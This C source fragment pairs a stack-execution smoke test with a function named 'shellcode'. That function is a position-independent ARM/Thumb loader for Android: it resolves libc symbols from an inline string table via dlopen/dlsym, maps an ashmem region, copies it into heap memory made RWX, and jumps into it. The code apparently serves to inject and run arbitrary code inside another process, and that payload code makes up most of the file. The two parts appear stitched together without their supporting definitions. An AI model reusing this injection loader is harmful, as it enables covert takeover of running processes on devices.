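/*
 * Smoke test for __enable_execute_stack() and __clear_cache():
 * copy func1 into a stack buffer, make that stack page executable, run
 * the copy, then overwrite the same buffer with func2 and run that.
 *
 * Returns 0 on success, 1 as soon as one of the copied functions does not
 * return its expected value (func1 -> 1, func2 -> 2).
 *
 * Relies on definitions elsewhere in this file: pfunc (function-pointer
 * type), func1/func2, and memcpy_f (a memcpy-style helper returning its
 * destination).  The 128-byte copy size is assumed to be at least as large
 * as both functions; nothing here can verify that.
 *
 * Security note: this deliberately defeats W^X for a stack page.  On
 * platforms that forbid executable stacks or anonymous executable memory
 * (SELinux execstack/execmem denials, hardened-runtime macOS, PaX-style
 * kernels) the protection change may be refused and the indirect call will
 * fault -- treat a failure here as a platform policy result before blaming
 * the library.
 */
int main(void)
{
    enum { EXEC_BUF_SIZE = 128 };
    unsigned char execution_buffer[EXEC_BUF_SIZE];
    unsigned char *buf_end = &execution_buffer[EXEC_BUF_SIZE];

    /* Mark the stack page containing execution_buffer executable.  Only the
     * buffer's start address is passed; whether a buffer that straddles a
     * page boundary gets both pages covered depends on the implementation
     * of __enable_execute_stack. */
    __enable_execute_stack(execution_buffer);

    /* First copy: a function copied onto the stack must be callable.
     * __clear_cache keeps the instruction cache coherent with the data
     * writes on architectures that need an explicit flush. */
    pfunc f1 = (pfunc)memcpy_f(execution_buffer, func1, EXEC_BUF_SIZE);
    __clear_cache(execution_buffer, buf_end);
    if ((*f1)() != 1)
        return 1;

    /* Second copy: overwriting the same buffer with another function must
     * execute the new code, not stale bytes from the first copy. */
    pfunc f2 = (pfunc)memcpy_f(execution_buffer, func2, EXEC_BUF_SIZE);
    __clear_cache(execution_buffer, buf_end);
    if ((*f2)() != 2)
        return 1;

    return 0;
}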
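// Position-independent loader stub (32-bit ARM/Thumb only: pointers are
// truncated to int/uint32_t throughout).  Given the address of dlopen() and a
// pointer to a parameter block it resolves the libc symbols it needs by name,
// maps the ashmem region whose fd is in the parameter block, copies the
// region into an RWX heap buffer and transfers control into it via run_code.
// No string literals, relocations or GOT entries are used so the compiled
// bytes can be copied to an arbitrary address; the symbol names live in an
// inline string table that is located through a pc read.
//
// Arguments:
//   dlopen_f - address of dlopen().  An even (ARM-mode) address has bit 0 set
//              so the call is made in Thumb state.  dlsym() is assumed to sit
//              8 bytes after dlopen() (libdl layout on the Android releases
//              this targeted -- verify against the actual target libdl.so).
//   pos      - parameter block.  Offsets 12/16/20 hold the ashmem fd and the
//              two pipe fds handed to the loaded code; bytes 0..11 are not
//              read here.
//
// Security notes: whatever is in the ashmem region is executed with no
// integrity or origin check, so the fd's producer fully controls this
// process.  mprotect() turns every heap page the buffer touches RWX,
// including any other allocation sharing those pages.  SELinux (execmem) may
// refuse the PROT_EXEC request on newer Android releases; failures of the
// resolution/mapping/protection steps now return instead of jumping into
// unusable memory.  run_code is defined elsewhere; its contract is not
// visible here beyond returning the image entry point.
void shellcode(dlopen_t dlopen_f,void *pos){
    char *str_array = NULL;
    // Read pc into str_array.  In Thumb state a pc read yields the address of
    // the current instruction + 4, i.e. the byte right after the 16-bit `b`
    // below, which is the first string of the table.  This relies on both
    // instructions being narrow encodings and on nothing being scheduled
    // between the two asm statements.
    asm __volatile__ ("mov %[result],pc":[result]"=r" (str_array));
    asm __volatile__ ("b .L_strlen_start");
    asm __volatile__ (".align 1");
    asm __volatile__ (".asciz \"printf\"");
    asm __volatile__ (".asciz \"__android_log_print\"");
    asm __volatile__ (".asciz \"mmap\"");
    asm __volatile__ (".asciz \"ashmem_pin_region\"");
    asm __volatile__ (".asciz \"ashmem_unpin_region\"");
    asm __volatile__ (".asciz \"ashmem_get_size_region\"");
    asm __volatile__ (".asciz \"mprotect\"");
    asm __volatile__ (".asciz \"malloc\"");
    asm __volatile__ (".asciz \"memcpy\"");
    asm __volatile__ (".asciz \"fd is %d, %x,%s\\n\"");
    asm __volatile__ (".asciz \"\xff\"");   // 0xff byte = end-of-table sentinel
    asm __volatile__ (".align 1");
    asm __volatile__ (".L_strlen_start:");

    // Split the table into one pointer per string.  The sentinel test goes
    // through unsigned char: plain char is unsigned on ARM, so `*p == 0xff`
    // happened to work there, but it can never be true where char is signed.
    char *fun_array[50];
    int nfun = 0;
    char *p = str_array;
    for(int i=0;i<50;i++){
        if((unsigned char)*p==0xff)
            break;
        fun_array[i]=p;
        nfun++;
        while(*p++!=0);
    }
    int s=9;   // index of the printf format string; s-2 is "malloc"
    // A truncated or corrupted copy of this stub leaves the table short;
    // every index used below must exist.
    if(nfun<=s)
        return;

    // Thumb functions are called through odd addresses.
    if((int)dlopen_f%2==0)
        dlopen_f = (dlopen_t)((int)(dlopen_f)+1);
    // Assumed libdl layout: dlsym immediately follows dlopen (8 bytes).
    dlsym_t dlsym_f = (dlsym_t)((int)dlopen_f+8);
    void *handle = dlopen_f(NULL,RTLD_NOW);
    if(handle==NULL)
        return;

    int f = 0;
    printf_t printf_f = (printf_t)dlsym_f(handle,fun_array[f++]);
    #define getaddr(func_name) func_name##_t func_name##_f = (func_name##_t)dlsym_f(handle,fun_array[f++])
    getaddr(__android_log_print);
    getaddr(mmap);
    getaddr(ashmem_pin_region);
    getaddr(ashmem_unpin_region);
    getaddr(ashmem_get_size_region);
    getaddr(mprotect);
    getaddr(malloc);
    getaddr(memcpy);
    #undef getaddr
    // Every name must resolve; an unresolved one would otherwise be called
    // as a NULL function pointer.
    if(printf_f==NULL || __android_log_print_f==NULL || mmap_f==NULL ||
       ashmem_pin_region_f==NULL || ashmem_get_size_region_f==NULL ||
       mprotect_f==NULL || malloc_f==NULL || memcpy_f==NULL)
        return;

    // Parameter block layout (only these three words are used here).
    int fd_memory = *(int*)((char*)pos+12);
    int pipe_from_client = *(int*)((char*)pos+16);
    int pipe_to_client = *(int*)((char*)pos+20);

    // Keep the region from being reclaimed while it is read.
    ashmem_pin_region_f(fd_memory, 0, 0);
    int ashem_size=ashmem_get_size_region_f(fd_memory);
    if(ashem_size<=0)
        return;
    uint8_t *shm = (uint8_t*)mmap_f(NULL, ashem_size, PROT_READ, MAP_SHARED, fd_memory, 0);
    if((void*)shm==MAP_FAILED)
        return;
    //can't mprotect ashmem as read and write, copy it to heap
    char *code = (char*)malloc_f(ashem_size);
    if(code==NULL)
        return;
    memcpy_f(code, shm, ashem_size);

    // mprotect() needs a page-aligned start, so the buffer's page base is
    // used; the length must then be measured from that base rather than from
    // `code`, otherwise the tail of a buffer that does not start on a page
    // boundary is left non-executable (the original passed ashem_size from
    // the page base).  Note this also makes neighbouring heap data RWX.
    uint32_t page_base = (uint32_t)code & 0xfffff000;
    uint32_t page_end = ((uint32_t)code + (uint32_t)ashem_size + 0xfff) & 0xfffff000;
    if(mprotect_f((void*)page_base, page_end - page_base, PROT_READ|PROT_WRITE|PROT_EXEC) != 0)
        return;

    // Diagnostics; every string comes from the table so no literal is needed.
    // Log priority 3 is presumably ANDROID_LOG_DEBUG -- confirm against
    // android/log.h.
    printf_f(fun_array[s],fd_memory,(char*)code,fun_array[s-2]);
    __android_log_print_f(3,fun_array[0],fun_array[s],fd_memory,code,fun_array[s-2]);
    so_start_t so_start = (so_start_t)run_code((char*)code,dlopen_f);
    so_start(pipe_from_client,pipe_to_client);
}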